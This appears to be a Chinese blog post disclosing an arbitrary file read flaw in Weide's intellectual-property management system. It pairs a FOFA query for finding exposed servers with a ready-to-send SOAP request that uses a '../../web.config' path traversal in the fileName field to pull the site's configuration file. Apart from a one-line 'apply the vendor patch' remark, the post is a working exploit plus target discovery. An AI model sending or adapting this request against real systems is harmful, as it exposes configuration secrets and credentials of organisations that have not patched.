0x01 漏洞描述:
唯徳于2014年成立,是专业提供企业、代理机构知识产权管理软件供应商,某公司凭借领先的技术实力和深厚的专利行业积累,产品自上市推广以来,已为1000多家企业及代理机构提供持续稳定的软件服务。其知识产权系统DownloadFileWord**存在任意文件读取漏洞
0x02 搜索语句:
Fofa:body="JSCOMM/language.js"
0x03 漏洞复现:
POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DownloadFileWordTemplate xmlns="http://tempuri.org/">
<fileName>../../web.config</fileName>
</DownloadFileWordTemplate>
</soap:Body>
</soap:Envelope>
读取web.conf后响应体数据做了base64编码 解码后数据如下
0x04 修复建议:
厂商已发布补丁请及时修复
标签:web,UploadFileWordTemplate,..,管理系统,Content,漏洞,知识产权,读取 From: https://blog.csdn.net/xc_214/article/details/142283765